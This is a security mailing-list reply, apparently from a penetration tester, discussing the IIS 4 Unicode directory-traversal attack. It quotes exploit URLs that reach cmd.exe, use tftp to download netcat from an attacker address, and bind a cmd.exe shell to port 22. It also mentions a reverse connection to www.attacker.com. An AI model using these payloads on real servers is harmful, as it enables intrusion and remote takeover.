Re: dos commands via iis 4 (TFTP)

[MadHat <madhat () UNSPECIFIC COM>]

"Bluefish (P.Magnusson)" wrote:
> > http://.../scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp+-i+<IPADDR>+get+nc.exe+c:\inetpub\scripts\nc.exe
> > http://.../scripts/..%c0%af../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\nc.exe+-l+-p+22+-t+-e+cmd.exe
> > So after this, there is a port open (22 in this case as many admins will
> > leave this open for SSH, but this is an NT box, which as we know rarely
> > has SSH running on it) that I can telnet to and have a command prompt.
>
> An more reliable attack though, would be to download and execute a client
> which connects to www.attacker.com:80, only port 80 won't be running a
> webserver but a server for the client.
>
> That way it will overcome more firewalls; only an application level
> firewall or a closed DMZ would cause problems, where as the attack you
> describe rely on some server port not being firewalled.

right, but this is all about misconfiguration.  If nothing is
misconfigured, and all patches are up to date, then you don't even get
this far.  The point was that once nc.exe is on the box, you can pick
and choose the port(s) you want to bind to depending on the situation
and the ACLs or firewall rules.  I chose 22 because it is often open for
ssh, as I mentioned, but I could have chosen 25 is there wasn't an SMTP
server,  but that was not left open in the case I was testing.  This is
just one part of the overall penetration, you would have to know more
info about the target before you can choose how to continue and what
will be best for any particular situation.  I personally like netcat, so
I chose that tool.  It is all personal preference, what you know and
what you feel comfortable using.  There is no "final answer" here.

--
MadHat at unspecific.com
                                   "The 3 great virtues of a programmer:
                                      Laziness, Impatience, and Hubris."
                                                 --Larry Wall